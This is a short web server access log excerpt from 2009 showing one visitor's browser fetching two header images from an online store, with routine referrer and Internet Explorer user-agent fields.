72.85.231.187 - - [28/Oct/2009:07:52:17 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F8C5D206006007329012+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
72.85.231.187 - - [28/Oct/2009:07:52:17 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L014F8C5D206006007329012+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
